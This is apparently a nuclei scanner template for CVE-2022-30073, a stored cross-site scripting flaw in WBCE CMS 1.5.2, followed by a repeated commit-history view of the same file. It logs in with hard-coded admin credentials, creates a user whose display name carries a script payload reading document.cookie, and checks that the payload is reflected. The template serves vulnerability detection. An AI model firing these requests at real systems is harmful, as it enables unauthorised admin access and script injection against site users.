nuclei-templates/cves/2022/CVE-2022-30073.yaml

id: CVE-2022-30073

info:
  name: WBCE CMS v1.5.2 XSS Stored
  author: arafatansari
  severity: medium
  description: |
    WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters.
  reference:
    - https://github.com/APTX-4879/CVE
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
  metadata:
    verified: true
  tags: wbcecms,xss

requests:
  - raw: 
      - |
        POST /wbcecms/wbce/admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login
        
      - |
        GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
        Host: {{Hostname}}    
        Content-Type: application/x-www-form-urlencoded
        
      - |
        POST /wbcecms/wbce/admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=nucl123&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=nucl121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
        
      - |
        GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
    cookie-reuse: true
    extractors:
      - type: regex 
        name: formtoken
        part: body
        group: 1
        regex:
          - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
        internal: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.cookie)</script>"
          
      - type: word
        part: header
        words:
          - text/html
          
      - type: status
        status:
          - 200
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`id: CVE-2022-30073`

			`info:`
			`name: WBCE CMS v1.5.2 XSS Stored`
			`author: arafatansari`
			`severity: medium`
			`description: \|`
			`WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters.`
			`reference:`
			`- https://github.com/APTX-4879/CVE`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073`
			`metadata:`
			`verified: true`
			`tags: wbcecms,xss`

			`requests:`
			`- raw:`
			`- \|`
			`POST /wbcecms/wbce/admin/login/index.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`- \|`
			`GET /wbcecms/wbce/admin/users/index.php HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00			`Content-Type: application/x-www-form-urlencoded`

Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`- \|`
			`POST /wbcecms/wbce/admin/users/index.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=nucl123&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=nucl121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`- \|`
			`GET /wbcecms/wbce/admin/users/index.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`cookie-reuse: true`
			`extractors:`
			`- type: regex`
			`name: formtoken`
			`part: body`
			`group: 1`
			`regex:`
			`- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'`
			`internal: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "<script>alert(document.cookie)</script>"`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`- type: word`
			`part: header`
			`words:`
			`- text/html`
Update CVE-2022-30073.yaml 2022-07-16 08:41:45 +00:00
Create CVE-2022-30073.yaml 2022-07-16 08:25:17 +00:00			`- type: status`
			`status:`
			`- 200`